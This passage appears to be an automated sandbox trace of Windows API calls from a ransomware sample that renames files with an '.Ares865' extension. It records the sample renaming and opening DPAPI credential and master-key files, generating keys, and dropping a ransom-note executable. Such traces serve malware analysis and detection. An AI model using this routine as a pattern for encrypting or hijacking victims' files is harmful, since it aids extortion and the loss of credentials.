HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CRLs" [0108.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\Certificates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\Certificates" [0108.287] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Speech", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Speech") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Speech" [0108.287] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks" [0108.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher" [0108.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect" [0108.288] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865") returned 81 [0108.289] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\credhist.ares865"), dwFlags=0x1) returned 1 [0108.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\credhist.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.291] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312) returned 1 [0108.291] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.292] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.292] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.294] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.294] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\SYNCHIST.Ares865") returned 81 [0108.295] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\SYNCHIST.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\synchist.ares865"), dwFlags=0x1) returned 1 [0108.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\SYNCHIST.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\synchist.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=76) returned 1 [0108.298] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.299] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.299] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.301] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.302] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.302] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.302] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0108.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.Ares865") returned 156 [0108.303] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.ares865"), dwFlags=0x1) returned 1 [0108.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.306] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.306] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.307] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.309] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.310] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.310] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.310] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.Ares865") returned 156 [0108.310] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.ares865"), dwFlags=0x1) returned 1 [0108.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.313] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.314] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.314] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.316] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.317] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.317] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.317] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.Ares865") returned 156 [0108.317] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.ares865"), dwFlags=0x1) returned 1 [0108.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.319] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.319] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.320] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.320] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.322] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.322] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.322] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.324] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.Ares865") returned 156 [0108.324] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.ares865"), dwFlags=0x1) returned 1 [0108.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.326] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.326] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.327] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.327] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.330] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.330] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0.Ares865") returned 156 [0108.330] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0.ares865"), dwFlags=0x1) returned 1 [0108.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\bce754d1-b047-42a2-8fc9-992d5016bbf0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.333] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.333] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.333] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.334] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.335] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.335] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.336] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.Ares865") returned 156 [0108.336] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ares865"), dwFlags=0x1) returned 1 [0108.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.338] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0108.338] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.339] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.339] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.340] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.341] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.341] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.Ares865") returned 129 [0108.342] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.ares865"), dwFlags=0x1) returned 1 [0108.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0108.344] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0490) returned 1 [0108.345] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.345] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.346] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0490) returned 1 [0108.347] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.347] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0108.348] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0108.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338fc8 | out: hHeap=0x2b0000) returned 1 [0108.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0108.348] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 110 [0108.348] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0108.348] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.348] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.349] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.349] GetLastError () returned 0x0 [0108.350] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865") returned 155 [0108.350] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application 